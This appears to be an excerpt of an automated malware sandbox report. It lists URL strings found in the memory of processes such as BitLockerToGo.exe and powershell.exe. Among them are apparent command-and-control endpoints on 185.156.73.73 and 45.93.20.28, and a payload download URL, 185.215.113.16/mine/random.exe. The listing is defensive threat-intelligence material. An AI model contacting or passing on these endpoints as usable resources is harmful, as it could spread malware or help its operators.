Source: BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/Sp5Sp5Sp5Sp5Sp5Sp5Sp5Sp5Sp5Sp5Sp5Sp5S
Source: BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ervice
Source: BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ervicehqos.dll.mui
Source: BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ervicewsock.dll.mui
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2751319207.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000002.3077094422.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/info
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/info6B
Source: BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ows
Source: BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service1kp
Source: BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service73.73/
Source: BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service73.73/2
Source: BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service73.73/servicex
Source: BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/service85
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceNkk
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2751319207.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceSrk/
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceSystem32
Source: BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceWk
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceZk
Source: BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicebusRFCOMM
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicefk
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicehqos.dll.mui
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2751319207.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicehqos.dll.muiP
Source: BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceik
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicelk
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicequ6
Source: BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicesystem32
Source: BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceuk4
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/serviceunixPschedvmbusRFCOMM
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicewsock.dll.mui
Source: BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2751319207.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicex
Source: BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/servicexk9
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/success?substr=mixfour&s=three&sub=non
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/success?substr=mixfour&s=three&sub=nonj
Source: BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/success?substr=mixtwo&s=three&sub=non
Source: BitLockerToGo.exe, 00000012.00000002.3077094422.00000000005C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/success?substr=mixtwo&s=three&sub=non$
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2825662167.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2775335983.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2851959597.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2800547310.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2751319207.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2924167594.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2876004427.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2999510485.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000002.3077094422.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2949105152.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2899555862.00000000005F5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.2974527707.00000000005F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/update
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000010.00000002.2990506144.00000000049C5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000002.3077094422.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000002.3077094422.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ycl
Source: BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ycl8d1
Source: BitLockerToGo.exe, 00000010.00000002.2985273050.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/yclVAO
Source: BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000012.00000003.3045905713.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/yclZk
Source: BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/yclice
Source: BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ycllk
Source: BitLockerToGo.exe, 00000012.00000002.3077094422.00000000005C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/yclm
Source: BitLockerToGo.exe, 00000012.00000003.3059709614.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.73/ycloV
Source: powershell.exe, 0000002E.00000002.3381480619.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16
Source: powershell.exe, 0000002E.00000002.3381480619.0000000004886000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 43a79b4335.exe, 00000013.00000002.2770927261.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.93.20.28
Source: 43a79b4335.exe, 00000013.00000002.2770927261.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, 43a79b4335.exe, 00000013.00000002.2770927261.0000000001608000.00000004.00000020.00020000.00000000.sdmp, 43a79b4335.exe, 00000013.00000002.2770927261.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.93.20.28/
Source: 43a79b4335.exe, 00000013.00000002.2770927261.0000000001608000.00000004.00000020.00020000.00000000.sdmp, 43a79b4335.exe, 00000013.00000002.2770927261.0000000001624000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.php
Source: 43a79b4335.exe, 00000013.00000002.2770927261.0000000001624000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.93.20.28/85a1cacf11314eb8.phpp=
Source: 43a79b4335.exe, 00000013.00000002.2770927261.00000000015F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.93.20.28/lZ
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 5a20b6327b.exe, 0000000B.00000003.2386341405.0000000005672000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2496220591.00000000054FE000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2724435198.000000000588E000.00000004.00000800.00020000.00000000.sdmp, 186adf2617.exe, 00000014.00000003.2839257952.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
